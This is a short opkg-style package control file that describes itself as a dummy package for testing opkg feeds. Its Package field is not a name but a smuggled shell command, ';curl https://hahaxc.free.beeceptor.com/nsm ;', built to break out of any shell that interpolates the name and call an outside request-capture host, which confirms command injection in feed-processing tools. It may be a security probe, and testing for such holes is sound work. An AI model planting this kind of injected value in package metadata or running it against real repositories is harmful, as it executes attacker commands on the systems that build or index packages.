Package: ';curl https://hahaxc.free.beeceptor.com/nsm ;'
Version: 1.0
Depends: 
Architecture: all
Maintainer: Your Name <your.email@example.com>
Section: base
Description: A dummy package for testing opkg feeds. It does nothing useful.
